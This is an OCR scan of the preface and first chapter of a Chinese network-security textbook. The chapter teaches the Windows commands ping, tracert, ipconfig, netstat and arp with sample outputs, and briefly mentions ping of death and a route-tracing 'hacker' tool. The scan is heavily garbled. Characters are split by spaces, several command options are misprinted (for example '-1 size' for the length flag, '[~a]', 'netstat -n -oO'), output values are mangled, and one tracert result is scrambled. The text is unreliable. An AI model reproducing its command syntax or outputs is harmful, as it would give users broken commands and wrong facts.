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前 言 


随 着 计算 机 网 络 在 政治 、 军 事 、 金 融 、 商 业 等 领域 的 广泛 应 用 ,人 类 社会 对 计算 机 网 络 的 
依赖 性 越 来 越 强 。 网 络 系统 如 果 遭 到 破坏 ,不 仅 会 引起 社会 混乱 ,还 将 带 来 巨大 的 经 济 损 
失 。 加 快 网 络 安全 保障 体系 的 建设 .培养 高 素质 的 网 络 安全 人 才 队 伍 人 迫在眉睫 。 编 者 根据 
教研 实践 编写 了 本 书 。 本 书 以 通俗 易 懂 的 形式 向 读者 介绍 网 络 与 信息 安全 技术 和 研究 成 
果 。 本 书 着 重 于 理论 知识 与 实践 相 结 合 , 希 望 能 对 网 络 工程 类 信息 安全 专业 的 学 生 和 其 他 
感 兴趣 的 读者 提供 实质 性 的 帮助 。 

本 书 主 要 介绍 网 络 与 信息 安全 面临 的 问题 和 采用 的 多 种 技术 。 第 1 章 是 本 书 的 基础 ， 
介绍 常用 的 网 络 命 令 、TCP/UDP/ICMP 协议 .常用 工具 软件 (网 络 包 分 析 工 具 Wireshark、 
网 络 扫描 器 Nmap、 漏 洞 扫描 器 Nessus、 数 学 软件 MATLAB 的 图 像 函 数 等 ) ,这 些 知 识 将 会 
在 后 续 内 容 中 用 到 ;第 2 章 介 绍 网 络 扫 描 的 主机 存活 扫描 (ping) 、 端 口 扫描 、 操 作 系 统 探测 、 
漏洞 探测 .防火墙 规 则 探测 五 大 主要 扫描 技术 以 及 嗅 探 技术 的 原理 等 ;第 3 章 介绍 包 过 滤 
型 ,状态 检测 型 .应 用 代理 型 防火 墙 的 技术 原理 与 应 用 ,涉及 Linux 的 防火 墙 工 具 iptables、 
Windows 的 自 带 防火 墙 等 ;第 4 章 介绍 木马 的 技术 原理 ,通过 实例 分 析 木 马 的 危害 ;第 5 章 
介绍 Web 面临 的 主要 威胁 ,包括 SQL 注入 、 跨 站 脚本 攻击 、 网 页 挂 马 等 攻击 类 型 ,提出 一 些 
防御 措施 ;第 6 章 介 绍 人 侵 检测 和 蜜 钠 两 种 重要 技术 ;第 7 章 介 绍 VPN 技术 ;第 8 章 介绍 加 
密 技术 ,如 DES、RSA ,混沌 加 密 等 ;第 9 章 介 绍 多 种 认证 技术 ,包括 口令 身份 .PKI 数字 证 
书 技术 、 数 字 签 名 技术 、SSL 技术 ,智能卡 认证 .基于 生物 特征 认证 ;第 10 章 主要 介绍 数字 水 
印 技术 中 的 空间 数字 水 印 .频率 数字 水 印 。 本 书 提供 了 大 量 的 应 用 实例 ,每 章 都 配 有 相当 数 
量 、 类 型 多 样 的 习题 。 

本 书 由 王 盛 邦 编写 , 谢 逸 、 农 革 审 阅 。 审 阅 者 对 本 书 内 容 提 出 了 很 多 宝贵 的 修改 意见 ， 
编者 在 此 表示 感谢 。 

在 本 书 编写 过 程 中 ,编者 参阅 了 大 量 书籍 资料 ,包括 网 络 上 论坛 .博客 ,借鉴 了 许多 网 络 
工程 经 验 。 中 山大 学 公共 教学 实验 中 心 刘 树 郁 博士 对 本 书 的 编写 给 予 了 大 力 支 持 。 清 华 大 
学 出 版 社 相 关 人 员 为 本 书 的 顺利 出 版 做 了 大 量 的 工作 。 在 此 对 所 有 为 本 书 的 顺利 出 版 提供 
帮助 的 人 士 及 所 有 参考 文献 的 作者 表示 衷心 的 感谢 。 

由 于 编者 水 平 有 限 ,不 足 之 处 在 所 难免 ,读者 在 使 用 本 书 的 过 程 中 ,如 果 发 现 错误 和 不 
当 之 处 , 敬 请 与 编者 联系 ,编者 的 联系 方式 为 wangshb@mail. sysu. edu. cn。 
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第 1 章 实验 基础 


本 章 主 要 介绍 与 实验 有 关 的 基础 知识 ,包括 常用 的 网 络 命令 、 网 络 包 分 析 工 具 
Wireshark、 网 络 扫 描 分 析 工 具 Nmap、 漏 洞 扫 描 分 析 工 具 Nessus、 数 学 软件 MATLAB 的 图 
像 函 数 以 及 实验 报告 的 书写 要 求 等 。 


1.1 常用 网 络 命令 


Windows 操作 系统 中 有 一 个 命令 行 解释 器 , 它 类 似 于 MS-DOS 的 命令 解释 程序 ,可 以 
在 其 中 输入 一 些 命令 ,实现 用 户 和 操作 系统 之 间 的 直接 通信 。 命 令 行 解释 器 提供 基于 字符 
的 应 用 程序 和 实用 程序 的 用 户 界面 ,可 通过 选择 “开始 ”>“ 所 有 程序 ”>“ 附 件 ”>“ 命 令 提示 
符 ” 方 式 进入 命令 行 解释 器 ( 即 命令 提示 符 窗口 ), 或 通过 单 击 “ 开 始 " 菜 单 ,在 “搜索 和 文件 ” 
对 话 框 中 输入 cmd 命令 快速 进入 命令 提示 符 窗口 。 然 后 在 提示 符 二 后 通过 键盘 输入 命令 ， 
可 以 通过 在 命令 后 加 /? 来 获得 使 用 帮助 。 

在 网 络 与 信息 安全 实践 中 ,命令 行 命令 是 非常 实用 的 工具 ,需要 熟练 掌握 。 由 于 网 络 命 
令 较 多 ,本 章 仅 介绍 常用 的 命令 。 


1.1.1 ping 命令 


在 进行 网 络 实验 .调试 的 过 程 中 ,ping 是 最 常用 的 一 个 命令 。ping 命令 全 称 Packet 
Internet Grope( 因 特 网 包 探 测 器 ), 一 般 用 来 测试 源 主机 到 目的 主机 网 络 的 连通 性 。ping 
命令 是 在 IP 层 中 利用 回应 请 求 / 应 答 ICMP 报 文 来 测试 目的 主机 或 路 由 器 的 可 达 性 的 。 不 
同 操作 系统 对 ping 命令 的 实现 有 所 差异 。 通 过 执行 ping 命令 主要 可 获得 如 下 信息 : 

(1) 监测 网 络 的 连通 性 ,检验 与 远程 计算 机 或 本 地 计算 机 的 连接 。 

(2) 确定 是 否 有 数据 包 被 丢失 、 复 制 或 重 传 。ping 在 所 发 送 的 数据 包 中 设置 唯一 的 序 
列 号 ,以 此 检查 其 接收 到 的 应 答 报 文 的 序列 号 。 

(3) ping 在 其 所 发 送 的 数据 包 中 设置 时 间 戳 (timestamp) ,根据 返回 的 时 间 戳 信息 可 以 
计算 数据 包 往 返 的 时 间 (Round Trip Time, RTT)。 

(4) ping 校 验 每 一 个 收 到 的 数据 包 , 据 此 可 以 确定 数据 包 是 否 损坏 。 

在 Windows 环境 下 .ping 命令 语法 如 下 : 


ping [=t] [~a] [=~n count] [-1 size] [~ £] [~-i TTL] [~v TOS] (~-r count] [~ s count] 
[[-jhost- list] | [- khost- 1list]] [-wtimeout] [-R] [-S srcaddr] [- 4] [- 6] target_ 
name 

其 中 : 

t ping 指定 的 主机 ,直到 停止 。 若 要 查看 统计 信息 并 继续 操作 , 按 Ctrl 十 


Break 键 ; 若 要 停止 , 按 Ctrl 十 C 键 。 


-a 将 地 址 解析 成 主机 名 。 
-n count 要 发 送 的 回 显 请 求 数 。 


-] size 发 送 缓冲 区 大 小 。 

和 在 数据 包 中 设置 “不 分 段 ” 标 志 ( 仅 适用 于 IPv4) 。 

-i TTL 生存 时 间 。 

-v TOS 服务 类 型 ( 仅 适用 于 IPv4。 该 设置 已 不 建议 使 用 , 且 对 IP 标 头 中 的 服 
务 字 段 类 型 没有 任何 影响 )。 

-r count 记录 计数 跃 点 的 路 由 ( 仅 适用 于 IPv4)。 

-s count 计数 跃 点 的 时 间 戳 ( 仅 适 用 于 IPv4)。 


-hostrlist 与 主机 列表 一 起 的 松散 源 路 由 ( 仅 适 用 于 IPv4) 。 
-k host-list 与 主机 列表 一 起 的 严格 源 路 由 ( 仅 适 用 于 IPv4)。 
-w timeout 等 待 每 次 回复 的 超时 时 间 ( 毫 秒 ) 。 


-R 同样 使 用 路 由 标 头 测试 反 向 路 由 ( 仅 适 用 于 IPv6)。 
-S srcaddr 要 使 用 的 源 地 址 。 

-4 强制 使 用 IPv4 。 

-6 强制 使 用 IPv6。 


在 这 些 参 数 中 ,用 得 较 多 的 有 tls 等 。t 表示 不 停 地 ping 目的 主机 ,直到 按 下 Ctrl 十 C 
键 时 手动 停止 ;1 表示 发 送 缓冲 区 大 小 (默认 值 为 32B);s 表示 使 用 时 间 截 选项 ( 仅 适用 于 
IPv4)。ping 命令 的 许多 选项 实际 上 是 指定 因特网 如 何 处 理 和 携带 回应 请 求 /应 答 ICMP 
报 文 的 IP 数据 包 。 

1. 发 送 ping 测试 报 文 

发 送 ping 测试 报 文 可 以 不 用 选项 。 如 执行 命令 “ping IP 地 址 ?或 “ping 域名 ”, 则 向 指 
定 的 IP 地 址 的 主机 或 域名 发 送 ping 测试 报 文 , 这 是 最 常用 的 一 种 使 用 方法 。 

【 例 1-1】 ping 搜狐 公司 的 域名 。 


C:\>ping www.sohu.com 

Pinging pgderbjt01.a.sohu.com [118.228.148.143] with 32 bytes of data: 
Reply from 118.228.148.143: bytes= 32 time= 69ms TTL= 48 

Reply from 118.228.148.143: bytes= 32 time= 69ms TTL= 48 

Reply from 118.228.148.143: bytes= 32 time= 64ms TTL= 48 

Reply from 118.228.148.143: bytes= 32 time= 67ms TTL= 48 


Ping statistics for 118.228.148.143: 
Packets: Sent= 4, Received=4, Lost=0 (0%loss), 
Approximate round trip times in milli-~ seconds: 


Minimum= 64ms，Maximum= 6%ms, Average= 67ms 
【 例 1-2】 ping 搜狐 公司 的 卫 地 址 。 


C:\>ping 118.228.148.143 

Pinging 118.228.148.143 with 32 bytes of data: 

Reply from 118.228.148.143: bytes= 32 time= 67ms TIL= 48 

Reply from 118.228.148.143: bytes= 32 time= 64ms TTL= 48 
和 


Reply from 118.228.148.143: bytes= 32 time= 67ms TTL= 48 
Reply from 118.228.148.143: bytes= 32 time= 65ms TTI= 48 


Ping statistics for 118.228.148.143: 

Packets: Sent= 4, Received=4, Lost=0 (0%loss), 

Approximate round trip times in milli- seconds: 

Minimum= 64ms，Maximum= 67ms，RAverage= 65ms 

在 例 1-1 中 ,我 们 知道 了 域名 www. sohu. com 的 IP 地 址 是 118. 228. 148. 143 ,所 以 在 
例 1-2 中 改 用 ping IP 地 址 ,结果 是 一 样 的 。 此 例 说 明 , 可 以 利用 该 命令 从 域名 查找 对 应 的 
IP 地 址 。 

在 例 1-1( 或 例 1-2) 命 令 显 示 的 结果 中 都 返回 了 4 个 测试 数据 包 ,其 中 bytes 王 32 表示 
测试 中 发 送 的 数据 包 大 小 是 32B,time 王 67ms 表示 与 对 方 主机 往返 一 次 所 用 的 时 间 是 
67ms。 信 息 显 示 , 这 4 个 数据 包 中 返回 速度 最 快 的 为 64ms, 最 慢 的 为 69ms, 平 均 速 度 为 
67ms。ping 能 够 以 毫秒 为 单位 显示 发 送 回 送 请 求 和 收 到 回 送 应 答 之 间 的 时 长 。 如 果 应 管 
时 间 短 ,表示 数据 包 没 有 通过 太 多 的 路 由 器 或 者 网 络 连接 速度 较 快 。 

TTL=48 表示 当前 测试 使 用 的 TTL 值 为 48。 因 为 ping 命令 使 用 网 络 层 协议 ICMP， 
所 以 TTL(Time to Live, 生 存 时 间 ) 指 的 是 一 个 网 络 层 的 数据 包 (package) 的 生存 周期 。 

TTL 的 作用 是 在 过 长 路 径 或 有 环 路 情况 下 令 设 备 抛弃 ICMP Request 包 。 因 为 一 个 
包 从 一 台 机 器 到 另 一 台 机 器 中 间 可 能 需要 经 过 很 长 的 路 径 , 这 个 路 径 可 能 是 很 复杂 的 ,并 且 
很 可 能 存在 环 路 。 假 设 一 个 数据 包 在 传输 过 程 中 进入 了 环 路 ,如 果 不 终止 它 , 它 会 一 直 循 环 
下 去 ,如 果 很 多 个 数据 包 都 这 样 循环 ,将 会 严重 影响 网 络 的 正常 运行 。 所 以 需要 在 包 中 设置 
生存 时 间 ,并 且 在 包 每 经 过 一 个 结 点 时 ,将 这 个 值 递减 1 ,最终 包 在 这 个 值 还 是 正 数 的 时 候 
到 达 目 的 地 ,或 者 是 在 经 过 一 定数 量 的 结 点 后 ,这 个 值 减 为 0。 前 者 代表 完成 了 一 次 正常 的 
传输 ;后 者 代表 包 可 能 选择 了 一 条 非常 长 的 路 径 ,甚至 是 进入 了 环 路 ,所 以 在 这 个 值 为 0 的 
时 候 , 网 络 设备 将 不 会 再 传递 这 个 包 ,而 是 直接 将 其 抛弃 ,并 发 送 一 个 通知 给 包 的 源 地 址 。 

2. 连续 发 送 ping 测试 报 文 

在 网 络 调试 过 程 中 ,有 时 需要 连续 发 送 ping 测试 报 文 ,一 旦 配置 正确 ,测试 主机 可 以 立 
即 报告 目的 地 可 达 信 息 。 连 续 发 送 ping 测试 报 文 可 以 使 用 -t 选项 。 如 执行 命令 


ping 192.168.1.100 -t 


表示 连续 向 IP 地 址 为 192. 168. 1. 100 的 主机 发 送 ping 测试 报 文 ,可 以 使 用 组 合 键 Ctrl 十 
Break 显示 发 送 和 接收 回应 请 求 /应 答 ICMP 报 文 的 统计 信息 ,此 时 ping 仍然 继续 。 要 结束 
ping 命令 ,可 以 使 用 Ctrl 十 C 键 。 

3. 自选 数据 长 度 的 ping 测试 报 文 

在 默认 情况 下 .ping 命令 使 用 的 测试 报 数据 长 度 为 32B, 使 用 -1 Size 选项 可 以 指定 测试 
数据 的 长 度 。 

【 例 1-3】 将 ping 的 数据 报 长 度 设 为 1560B: 

C:\ >ping 92.168.1.100 -1 1560 


Pinging 192.168.1.100 with 1560 bytes of data: 
Reply from 192.168.1.100: bytes=1560 time< lms TTI= 128 


Reply from 192.168.1.100: bytes=1560 time< lIms TTL=128 
Reply from 192.168.1.100: bytes=1560 time< lIms TTL=128 
Reply from 192.168.1.100: bytes=1560 time< lms TTL=128 


Ping statistics for 192.168.1.100: 
Packets: Sent= 4, Received=4, Lost=0 (0%loss), 
Approximate round trip times in milli- seconds: 


Minimum= Oms, Maximum= Oms, Average= 0ms 


虽然 -1 参数 可 以 自 定义 ,但 是 最 大 值 限 制 为 65 500B。 

在 ping 的 使 用 中 ,还 常用 ping 127. 0. 0. 1 来 检测 TCP/IP 协议 是 否 工 作 正 常 ,其 中 
127.0.0.1 是 本 地 环 回 地 址 ,如 发 现 本 地 地 址 无 法 ping 通 , 就 表明 本 地 机 器 TCP/IP 协议 不 
能 正常 工作 。 

在 排除 网 络 连通 性 故障 时 ping 命令 非常 有 用 ,但 是 它 也 存在 局 限 性 。 在 一 些 场合 需要 
使 用 tracert 命令 , 它 可 以 显示 网 络 响应 时 间 和 路 径 信息 。 

黑客 的 攻击 往往 是 从 ping 开始 的 ,一 般 用 它 判 断 主机 是 否 在 线 。 历 史上 ping 曾 被 作 
为 一 款 攻击 工具 使 用 , 即 所 谓 的 ping of death( 死 亡 之 ping) , 它 通过 多 台 PC 发 送 特 大 ping 
数据 包 (65 500B) 导 致 目标 机 器 崩溃 。 


1.1.2 tracert 命令 


tracert(trace route, 跟 踪 路 由 ) 是 路 由 跟踪 实用 程序 ,用 于 获得 IP 数据 报 访问 目标 时 从 
本 地 计算 机 到 目的 主机 的 路 径 信 息 。tracert 通过 发 送 数据 报到 目的 设备 ,根据 应 答 报 文 
(ICMP) 得 到 路 径 和 延迟 信息 (TTL)。 对 于 一 条 路 径 上 的 每 个 设备 tracert 要 测 3 次 ,因而 
有 3 个 探测 包 的 回应 时 间 。 一 般 在 网 络 状态 稳定 的 情况 下 ,3 个 时 间 差 不 多 ;如 果 这 3 个 时 
间 相 差 比较 大 ,说 明 网 络 状 态 变化 较 大 。 

tracert 通过 向 目的 地 发 送 具 有 不 同 IP 生存 时 间 (TTL) 值 的 Internet 控制 消息 协议 
(ICMP) 回 送 请 求 报 文 ,以 确定 到 达 目 的 地 的 路 由 。 所 显示 的 路 径 是 源 主机 与 目标 主机 间 
的 路 径 中 的 路 由 器 的 近 侧 路 由 器 接口 列表 。 近 侧 接口 是 距离 路 径 中 的 发 送 主机 最 近 的 路 由 
器 的 接口 。tracert 先 发 送 TTL 为 1 的 回应 数据 包 , 并 在 随后 的 每 次 发 送 过 程 中 将 TTL 递 
增 1, 直 到 目标 响应 或 TTL 达到 最 大 值 ,从 而 确定 路 由 。 这 一 点 与 ping 命令 不 同 ,ping 时 
TTL 是 递减 的 ,数据 包 上 的 TTL 减 为 0 时 ,路 由 器 应 该 将 “ICMP 已 超时 ”的 消息 发 回 源 系 
统 。 某 些 路 由 器 不 经 询问 直接 丢弃 TTL 过 期 的 数据 包 ,这 在 tracert 实用 程序 中 是 看 不 到 
的 。 在 这 种 情况 下 ,将 为 该 跃 点 (hop) 显 示 一 行星 号 (* ) 。 

tracert 命令 在 执行 时 会 很 缓慢 ,这 主要 是 tracert 试图 将 中 间 路 由 器 的 IP 地 址 解析 为 
它们 的 名 称 。 如 果 使 用 -d 选项 , 则 tracert 实用 程序 不 在 每 个 IP 地 址 上 查询 DNS ,这样 可 
加 速 显 示 tracert 的 结果 。tracert 的 输出 结果 中 包括 每 次 测试 的 时 间 和 设备 的 名 称 或 IP 
地 址 。 

在 Windows 环境 下 ,tracert 命令 语法 如 下 : 


tracert [-d] [-h maximum hops] [-j host- list] [-wtimeout] [-R] [-S srcaddr] [-4] [-6] 
target name 


。4 。 


其 中 : 
-d 


-h maximum_hops 


-] host-list 
-w timeout 
-RR 
-S srcaddr 
-4 
-6 


【 例 1-4】 如 果 数 据 包 必须 通过 两 个 路 由 器 (10. 10. 10. 1 和 192. 168. 0. 1) 才 能 到 达 主 


不 将 地 址 解析 成 主机 名 。 

搜索 目标 的 最 大 路 点 数 。 

与 主机 列表 一 起 的 松散 源 路 由 ( 仅 适用 于 IPv4)。 
等 待 每 个 回复 的 超时 时 间 ( 以 毫秒 为 单位 )。 
跟踪 往返 行程 路 径 ( 仅 适用 于 IPv6)。 

要 使 用 的 源 地 址 ( 仅 适用 于 IPv6)。 

强制 使 用 IPv4。 

强制 使 用 IPv6。 


机 172. 16. 0. 88, 主 机 的 默认 网 关 是 10. 10. 10. 1, 那 么 192. 168. 0. 1 网 络 上 的 路 由 器 的 JP 


地 址 是 192. 168. 0. 1。 


C:\>tracert 172.16.0.88 -d 


Tracing route to 172.16.0.88 over a maximum of 30 hops 
1 30ms 35ms 30ms 10,10.10,1 
2 45ms S55ms 50ms 192.168.0.1 


3 关 关 


关 


Request timed out. 


4 63ms 66ms 60ms 172.16.0.88 


Trace complete. 


第 1 列 是 经 过 路 由 节点 的 顺序 编号 。 第 2 一 4 列表 示 一 个 路 由 节点 到 另外 一 个 路 由 节 
点 的 通信 时 间 ,单位 是 毫秒 。 其 中 * 表示 超时 ,没有 解析 出 正确 地 址 。 这 是 由 于 这 些 路 由 器 
对 于 tracert 命令 不 可 见 (可 能 基于 安全 考虑 ,路 由 节点 隐蔽 了 其 信息 )。 在 这 种 情况 下 ,将 
为 该 跃 点 显示 一 行星 号 。 最 后 一 列 是 途经 路 由 器 的 IP 地址。 

【 例 1-5】 跟踪 www. sina. com 路 由 。 


C:\>tracert www.sina.com 


Tracing route to newssy.sina.com.cn [218.60.32.23] 


over a maximum of 30 hops: 


1 ms <1 ms 
<1ms lms 
<1ms <lms 
1 ms <1 ms 
6 ms 5 ms 


关 关 


1 ms <1 ms 


oem 上 wmwN PP 


<1ms <lms 


Trace complete. 


<1 ms 
1 ms 
<1 ms 


<1 ms 


218.25.120.49 

218.25.3.209 

218.25.2.125 

218.25.2.98 

cncln.online.ln.cn [218.60.20.250] 
Request timed out. 
cncln.online.ln.cn [218.60.22.246] 
cncln.online.ln.cn [218.60.32.23] 


结果 显示 ,5 和 6 路 由 节点 之 间 在 tracert 测试 下 超时 。 但 是 因为 后 面 7、8 能 返回 正确 
结果 ,说 明 网 络 仍 然 是 畅通 的 。 

tracert 命令 虽然 可 以 查看 路 由 信息 ,但 是 目前 大 多 数 路 由 器 都 对 tracert 命令 做 了 限 
制 ,导致 tracert 命令 没有 解析 出 正确 地 址 。 黑 客 软 件 x-firewalk. exe( 下 载 地 址 是 http:// 


www. xdoors. net/) 也 可 用 于 在 Windows 环境 下 查看 路 由 信息 , 且 比 tracert 实用 。 


1.1.3 ipconfig 命令 


ipconfig 命令 可 以 显示 所 有 当前 的 TCP/IP 网 络 配置 值 ( 如 IP 地 址 、 网 关 、 子 网 掩 码 )、 
刷新 动态 主机 配置 协议 (DHCP) 和 域名 系统 (DNS) 设置 。 
在 Windows 环境 下 ,ipconfig 命令 的 语法 格式 如 下 : 


ipconfig [/allcompartments] [/?| /all | /renew [adapter] | /release [adapter] | 


其 中 : 

Ps 

/all 

/release 
/release6 
/renew 
/renew6 
/flushdns 
/registerdns 
/displaydns 
/showclassid 
/setclassid 
/showclassid6 


/setclassid6 


/renew6 [adapter] | /release6 [adapter] | 
/flushdns | /displaydns | /registerdns | 
/showclassid adapter | 

/setclassid adapter [classid] | 
/showclassid6 adapter | 

/setclassid6 adapter [classid] ] 


显示 此 命令 的 帮助 消息 。 

显示 完整 配置 信息 。 

释放 指定 适配器 的 IPv4 地 址 。 

释放 指定 适配器 的 IPv6 地 址 。 

更 新 指定 适配器 的 IPv4 地 址 。 

更 新 指定 适配器 的 IPv6 地 址 。 

清除 DNS 解析 程序 缓存 。 

刷新 所 有 DHCP 租约 并 重新 注册 DNS 名 称 。 
显示 DNS 解析 程序 缓存 的 内 容 。 

显示 适配器 的 所 有 允许 的 DHCP 类 ID。 
修改 DHCP 类 ID。 

显示 适配器 允许 的 所 有 IPv6 DHCP 类 ID。 
修改 IPv6 DHCP 类 ID。 


ipconfig 命令 最 适用 于 配置 为 自动 获取 IP 地 址 的 计算 机 。 它 使 用 户 可 以 确定 哪些 
TCP/IP 配置 值 是 由 DHCP、 自 动 专用 IP 寻 址 和 其 他 配置 方式 设置 的 。 
如 果 adapter( 适 配器 名 称 ) 中 包含 空格 ,要 在 该 适配器 名 称 两 边 使 用 引号 ( 即 " 适 配器 名 


称 ")。 


对 于 适配器 名 称 ,ipconfig 可 以 使 用 星 号 (* ) 通 配 符 字符 指定 名 称 为 指定 字符 串 开 头 
的 适配器 或 名 称 包含 有 指定 字符 串 的 适配器 。 例 如 ,Local* 可 以 匹配 所 有 以 字符 串 Local 
开头 的 适配器 ,而 * Con* 可 以 匹配 所 有 包含 字符 串 Con 的 适配器 。 


下 面 是 一 些 使 用 实例 。 


(1) 显示 所 有 适配器 的 基本 TCP/IP 配置 : 


ipconfig 


(2) 显示 所 有 适配器 的 完整 TCP/IP 配置 : 


汪汪 


ipconfig /all 

(3) 仅 更 新 “本 地 连接 ”适配器 的 由 DHCP 分 配 IP 地 址 的 配置 : 

ipconfig /renew 

(4) 在 排除 DNS 的 名 称 解析 故障 期 间 刷 新 DNS 解析 器 缓存 : 

ipconfig /flushdns 

(5) 仅 更 新 Local Area Connection 适配器 的 由 DHCP 分 配 IP 地 址 的 配置 : 
ipconfig /renew "Local Area Connection" 

(6) 在 排除 DNS 的 名 称 解 析 故障 期 间 刷 新 DNS 解析 器 缓存 : 

ipconfig /flushdns 

(7) 显示 名 称 以 Local 开头 的 所 有 适配器 的 DHCP 类 别 ID: 

ipconfig /showclassid Localx 

(8) 要 将 Local Area Connection 适配器 的 DHCP 类 别 ID 设置 为 TEST: 


ipconfig /setclassid "Local Area Connection" TEST 


其 中 ,(1) 和 (2) 是 ipconfig 命令 两 种 最 常用 的 使 用 形式 。 
在 IPv6 协议 下 ,ipconfig /all 命令 显示 的 内 容 包括 所 有 接口 的 IPv6 地 址 .默认 路 由 器 
和 DNS 服务 器 。 


1.1.4 netstat 命令 


netstat 命令 可 以 显示 当前 活动 的 TCP 连接 .计算 机 侦 听 的 端口 .以 太 网 统计 信息 、IP 
路 由 表 、IPv4 统计 信息 (对 于 IP、.ICMP、TCP 和 UDP 协议) 以 及 IPv6 统计 信息 (对 于 IPv6 、 
ICMPv6 .通过 IPv6 的 TCP 以 及 通过 IPv6 的 UDP 协议 )。 

在 Windows 环境 下 ,netstat 的 语法 格式 如 下 : 


netstat [-a]l [-b] [-e] [-f] [-n] [-o] [~-p proto] [-r] [-s] [-t] [interval] 


其 中 

-a 显示 所 有 连接 和 侦 听 端口 。 

-b 显示 在 创建 每 个 连接 或 侦 听 端口 时 涉及 的 可 执行 组 件 。 在 某 些 情况 下 ， 
已 知 可 执行 组 件 拥 有 多 个 独立 组 件 ,此 时 ,显示 创建 连接 或 侦 听 端口 时 涉 
及 的 组 件 序列 ,可 执行 组 件 的 名 称 位 于 底部 [标记 中 , 它 调用 的 组 件 位 于 
顶部 ,直到 TCP/IP 部 分 。 注 意 ,此 选项 可 能 很 耗 时 ,并 且 在 没有 足够 权 
限时 可 能 失败 。 

-e 显示 以 太 网 统计 。 此 选项 可 以 与 -s 选项 结合 使 用 。 

二 显示 外 部 地 址 的 完全 限定 域名 (FQDN)。 

-n 以 数字 形式 显示 地 址 和 端口 号 。 

-0 显示 拥有 的 与 每 个 连接 关联 的 进程 ID。 


-p proto 显示 proto 指定 的 协议 的 连接 ;proto 可 以 是 下 列 任何 一 个 : TCP、UDP、 
TCPv6 或 UDPv6。 如 果 与 -s 选项 一 起 用 来 显示 每 个 协议 的 统计 ,proto 
可 以 是 下 列 任何 一 个 : IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP 或 


UDPv6 。 
-r 显示 路 由 表 。 
-s 显示 每 个 协议 的 统计 。 上 默认 情况 下 ,显示 IP、IPv6、ICMP、ICMPv6、TCP、 
TCPv6、UDP 和 UDPv6 的 统计 信息 。-p 选项 可 用 于 指定 默认 的 子 网 。 
-t 显示 当前 连接 印 载 状 态 。 


interval 重新 显示 选 定 的 统计 信息 ,各 个 显示 间 和 暂停 的 间隔 秒 数 。 按 Ctrl 十 C 键 
停止 重新 显示 统计 。 如 果 省 略 interval, 则 netstat 将 打印 当前 的 配置 信 
息 一 次 。 

下 面 是 一 些 使 用 实例 。 

(1) 显示 所 有 活动 的 TCP 连接 以 及 计算 机 侦 听 的 TCP 和 UDP 端口 : 


netstat -an 

(2) 显示 以 太 网 统计 信息 ,如 发 送 和 接收 的 字 节 数 、 数 据 包 数 : 
netstat -e-s 

(3) 仅 显示 TCP 和 UDP 协议 的 统计 信息 : 

netstat -s -p tcp udp 

(4) 每 5s 显示 一 次 活动 的 TCP 连接 和 进程 ID: 

netstat -o 5 

(5) 以 数字 形式 显示 活动 的 TCP 连接 和 进程 ID: 

netstat -n -oO 


netstat 命令 的 一 个 重要 作用 是 端口 占用 查询 , 据 此 可 以 发 现 本 机 开放 的 端口 是 否 被 植 
入 了 木马 或 其 他 黑客 程序 。 


1.1.5 arp 命令 


arp(address resolution protocol, 地 址 解析 协议 ) 命 令 是 把 基于 TCP/IP 的 软件 使 用 的 
IP 地 址 解析 成 LAN 硬件 使 用 的 介质 访问 控制 地 址 (一 般 指 网 卡 地 址 ,也 称 MAC 地 址 )。 
执行 arp 命令 对 同一 物理 网 络 上 的 主机 提供 以 下 协议 服务 : 

(1) 通过 使 用 网 络 广播 请 求 获得 介质 访问 控制 地 址 ( 即 由 厂商 为 设备 编 入 的 唯一 地 址 ， 
通常 用 十 六 进 制 表示 ,如 00-AA-00-3F-89-4A) ,询问 “配置 成 包含 IP 地 址 的 设备 的 介质 访 
问 控制 地 址 是 什么 ?” 

(2) 回应 ARP 请 求 时 ,ARP 回复 的 发 送 方 和 原始 ARP 请 求 方 都 将 彼此 的 IP 地 址 及 
介质 访问 控制 地 址 记录 成 被 称 为 ARP 缓存 的 本 地 表 中 的 项 目 . 以 便 将 来 引用 。 

为 使 广播 量 最 小 ,ARP 维护 IP 地 址 到 介质 访问 控制 地 址 映射 的 缓存 以 便 将 来 使 用 。 
ARP 缓存 可 以 包含 动态 和 静态 项 目 。 动 态 项 目 随时 间 推 移 自 动 添加 和 删除 ;静态 项 目 一 直 


保留 在 缓存 中 ,直到 重新 启动 计算 机 为 止 。 

每 个 动态 ARP 缓存 项 目的 潜在 生存 时 间 是 10min。 新 加 到 缓存 中 的 项 目 带 有 时 间 戳 。 
如 果 某 个 项 目 添 加 后 2min 内 没有 再 使 用 , 则 此 项 目 过 期 并 从 ARP 缓存 中 删除 。 如 果 某 个 
项 目 已 在 使 用 , 则 又 增加 2min 的 生存 时 间 。 如 果 某 个 项 目 始终 在 使 用 , 则 会 继续 维持 2min 
的 生命 周期 ,一 直到 10min 的 最 长 生存 时 间 。 

arp 命令 的 语法 格式 如 下 : 

arp -s inet agdr eth aqqr [if addr] 

arp -dinet addr [if addr] 

arp -a [inet addr] [-N if addr] [-v] 


其 中 : 

-a 通过 询问 当前 协议 数据 ,显示 当前 ARP 项 。 如 果 指 定 inet_addr, 则 只 显 
示 指 定 计算 机 的 IP 地 址 和 物理 地 址 。 如 果 不 止 一 个 网 络 接口 使 用 
ARP, 则 显示 每 个 ARP 表 的 项 目 。 

-g 与 -a 相同 。 

> 在 详细 模式 下 显示 当前 ARP 项 。 所 有 无 效 项 和 环 回 接口 上 的 项 都 将 


显示 。 
inet_addr 指定 Internet 地 址 。 
-N if_addr 显示 if_addr 指定 的 网 络 接 口 的 ARP 项 。 


-d 删除 inet_addr 指定 的 主机 。inet_addr 可 以 是 通配符 x , 即 删 除 所 有 主机 。 
-S 添加 主机 并 且 将 Internet 地 址 inet_addr 与 物理 地 址 eth_addr 相关 联 。 


物理 地 址 是 用 连 字符 分 隔 的 6 个 十 六 进 制 字 节 ,该 地 址 是 永久 的 。 
eth_addr 指定 物理 地 址 。 
if_addr 如 果 存 在 ,此 项 指定 地 址 转换 表 应 修改 的 接口 的 Internet 地 址 。 如 果 不 
存在 , 则 使 用 第 一 个 适用 的 接口 。 
表 中 inet_addr 和 if_addr 的 IP 地 址 用 点 分 十 进 制 记 数 法 表示 。 物 理 地 址 eth_addr 长 
度 为 6B, 这 些 字 节 用 十 六 进 制 记 数 法 表示 并 且 用 连 字符 隔 开 〈 比 如 ,00-AA-00-5E-3B-6D) 。 
下 面 是 一 些 使 用 实例 。 
(1) 显示 所 有 接口 的 ARP 缓存 表 : 


arp -a 
(2) 显示 IP 地 址 为 192. 168. 1. 100 的 接口 ARP 缓存 表 : 

arp -a -N192.168.1.100 

